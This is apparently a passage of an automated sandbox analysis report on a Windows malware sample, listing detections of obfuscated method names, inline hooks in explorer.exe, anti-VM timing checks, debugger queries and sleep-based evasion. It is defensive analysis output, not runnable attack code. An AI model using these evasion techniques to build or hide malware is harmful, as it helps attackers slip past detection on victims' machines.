          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, KnBoLaEC5ps0SdFfvX.csHigh entropy of concatenated method names: 'hv1SgCkChs', 'OVbSsbw852', 'FdpSK5fAxc', 'YHXSA4K7kt', 'GojSVZ55Jf', 'Cc6SM0jAt7', 'sCAkQKg2cvqFHCH0B3', 'VrDpJEputIqp0Ulg96', 'cvnSShAnTf', 'kQjSa1gQ5c'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, tT2aB2UoXyApRnSon7.csHigh entropy of concatenated method names: 'dX7LR1vk9V', 'B3OL2xDDy1', 'hnpL1D6Cy6', 'im7LI7s4mD', 'y3ALYW0dt4', 'AEJLi1sOTj', 'GToLoiwNGh', 'mxYLu87ydI', 'EGmLOgQMB6', 'qoZLJWKHMY'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, l7ktCZ8Ijwwk91ojZ5.csHigh entropy of concatenated method names: 'FYwtCMZCJd', 'gTqtG3gJdB', 'XABenZyeeJ', 'QgSeY1bnQ2', 'nOOeipIr4r', 'PqpeXyB4IA', 'rl2eoiVghU', 'xuQeuqmQRv', 'hPyeZgVeUj', 'bxSeOkvgeU'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.csHigh entropy of concatenated method names: 'ypVaxeNXId', 'X22ac2lT1o', 'lp8aW69TVk', 'QsbaePtRmt', 'NxRatLP8WN', 'fYHa7itBuB', 'ehnagjIMVa', 'hT8ascyKyx', 'QATaqDAYmQ', 'f12aKNDIvB'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, SvIMZ26nZwGhDqs2Rg.csHigh entropy of concatenated method names: 'dyDlcIp0sx', 'nfTlWkgpnw', 'GXpleshfA2', 'aAWltBtUvU', 'hkVl7b1XKR', 'NbwlgLGRvO', 'qhTlsAgoEO', 'f0klqaXkdm', 'ATIlKa7FCD', 'Q3XlA9sMQ9'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 4196, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: BB9904 second address: BB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: BB9B7E second address: BB9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 7C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: 9DB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: A120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: B120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: C120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: D120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: E120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: F120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: F7E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8068Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 734Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 9239Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13897
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 1.8 %
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2360Thread sleep count: 1877 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2360Thread sleep time: -3754000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2360Thread sleep count: 8068 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2360Thread sleep time: -16136000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508Thread sleep count: 734 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508Thread sleep time: -1468000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508Thread sleep count: 9239 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508Thread sleep time: -18478000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000003.3777027124.0000000009BB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.3094852288.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000004.00000002.4454444252.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000003.3094852288.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.4452340558.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CA197 mov eax, dword ptr fs:[00000030h]3_2_019CA197
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CA197 mov eax, dword ptr fs:[00000030h]3_2_019CA197
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CA197 mov eax, dword ptr fs:[00000030h]3_2_019CA197
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8C188 mov eax, dword ptr fs:[00000030h]3_2_01A8C188
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8C188 mov eax, dword ptr fs:[00000030h]3_2_01A8C188
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A10185 mov eax, dword ptr fs:[00000030h]3_2_01A10185
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A74180 mov eax, dword ptr fs:[00000030h]3_2_01A74180
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A74180 mov eax, dword ptr fs:[00000030h]3_2_01A74180
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA61E5 mov eax, dword ptr fs:[00000030h]3_2_01AA61E5
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A001F8 mov eax, dword ptr fs:[00000030h]3_2_01A001F8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A961C3 mov eax, dword ptr fs:[00000030h]3_2_01A961C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A961C3 mov eax, dword ptr fs:[00000030h]3_2_01A961C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A00124 mov eax, dword ptr fs:[00000030h]3_2_01A00124
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A90115 mov eax, dword ptr fs:[00000030h]3_2_01A90115
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7A118 mov ecx, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7A118 mov eax, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7A118 mov eax, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7A118 mov eax, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D6154 mov eax, dword ptr fs:[00000030h]3_2_019D6154
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D6154 mov eax, dword ptr fs:[00000030h]3_2_019D6154
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CC156 mov eax, dword ptr fs:[00000030h]3_2_019CC156
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4164 mov eax, dword ptr fs:[00000030h]3_2_01AA4164
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4164 mov eax, dword ptr fs:[00000030h]3_2_01AA4164
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A64144 mov ecx, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A68158 mov eax, dword ptr fs:[00000030h]3_2_01A68158
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A680A8 mov eax, dword ptr fs:[00000030h]3_2_01A680A8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A960B8 mov eax, dword ptr fs:[00000030h]3_2_01A960B8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A960B8 mov ecx, dword ptr fs:[00000030h]3_2_01A960B8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D208A mov eax, dword ptr fs:[00000030h]3_2_019D208A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C80A0 mov eax, dword ptr fs:[00000030h]3_2_019C80A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A560E0 mov eax, dword ptr fs:[00000030h]3_2_01A560E0
